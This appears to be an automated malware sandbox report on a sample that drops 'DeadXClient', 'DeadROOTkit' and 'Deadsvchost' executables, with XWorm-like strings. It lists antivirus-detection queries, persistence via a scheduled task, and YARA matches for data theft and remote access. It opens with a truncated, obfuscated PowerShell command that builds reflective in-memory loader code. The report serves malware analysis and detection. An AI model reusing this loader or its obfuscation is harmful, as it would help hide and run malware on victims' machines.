Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:bubcgltffnzz{param([outputtype([type])][parameter(position=0)][type[]]$qbdraqnalmmwja,[parameter(position=1)][type]$duqqlsyxsk)$pndjvvbnfjt=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+''+[char](102)+''+[char](108)+''+[char](101)+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+'e'+[char](108)+''+[char](101)+''+'g'+''+[char](97)+''+[char](116)+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+'n'+''+[char](77)+''+'e'+''+[char](109)+''+'o'+''+'r'+'y'+[char](77)+'o'+[char](100)+''+[char](117)+'l'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+'de'+'l'+'e'+[char](103)+''+[char](97)+''+[char](116)+''+'e'+''+'t'+''+'y'+''+'p'+''+'e'+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'u'+'b'+'l'+[char](105)+''+[char](99)+','+'s'+''+'e'+''+[char](97)+''+[char](108)+''+[char](101)+'d,a'+[char](110)+''+[char](115)+'i'+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+'au'+[char](116)+''+'o'+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$pndjvvbnfjt.defineconstructor(''+[char](82)+''+[char](84)+'s'+[char](112)+''+'e'+''+[char](99)+''+[char](105)+''+[char](97)+''+[char](108)+''+'n'+''+[char](97)+'m'+[char](101)+''+','+''+'h'+''+[char](105)+''+'d'+''+'e'+''+[char](66)+'y'+[char](83)+'i'+'g'+''+[char](44)+''+'p'+''+[char](117)+''+[char](98)+''+'l'+''+'i'+''+[char](99)+'',[reflection.callingconventions]::standard,$qbdraqnalmmwja).setimplementationflags('r'+[char](117)+''+'n'+'t'+[char](105)+''+'m'+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$pndjvvbnfjt.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](
111)+''+[char](107)+''+'e'+'',''+'p'+''+[char](117)+'bl'+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+'i'+''+[char](100)+'e'+'b'+''+[char](121)+''+'s'+''+'i'+''+'g'+''+[char](44)+''+[char](78)+''+[char](101)+''+[char](119)+''+[char](83)+''+[char](108)+''+[char](111)+''+'t'+','+[char](86)+''+[char](105)+'r'+[char](116)+'u'+'a'+''+'l'+'',$duqqlsyxsk,$qbdraqnalmmwja).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+'e'+[char](44)+''+'m'+'a'+[char](110)+''+[char](97)+''+'g'+''+[char](101)+''+[char](100)+'');write-output $pndjvvbnfjt.createtype();}$rjkdrlkuxkpoh=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sy'+'s'+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+'l'+[char](108)+'')}).gettype(''+'m'+''+[char](105)+''+[char](99)+'r'+[char](111)+''+'s'+''+[char](111)+''+'f'+'t.w'+[char](105)+'n'+[char](51)+'2.'+[char](85)+''+[char](110)+'s'+[char](97)+'f
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_00000001400022FC
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000010.00000002.3008522588.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.1784338217.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2b
Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A0715C0 cpuid 6_3_000002E86A0715C0
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Queries volume information: C:\Users\user\Desktop\mIURiU8n2P.exe VolumeInformation
Source: C:\Users\Public\DeadXClient.exe Queries volume information: C:\Users\Public\DeadXClient.exe VolumeInformation
Source: C:\Users\Public\DeadXClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\DeadROOTkit.exe Queries volume information: C:\Users\Public\DeadROOTkit.exe VolumeInformation
Source: C:\Users\Public\DeadROOTkit.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Deadsvchost.exe Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
Source: C:\Users\Public\Deadsvchost.exe Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Deadsvchost.exe Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_00000001400022FC
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A097D80 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_000002E86A097D80
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, DeadXClient.exe, 00000001.00000002.3027772809.000000001B9AD000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B24A000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C232000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2927052039.0000000000653000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C238000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.25.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadROOTkit.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadROOTkit.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\DeadXClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\DeadXClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP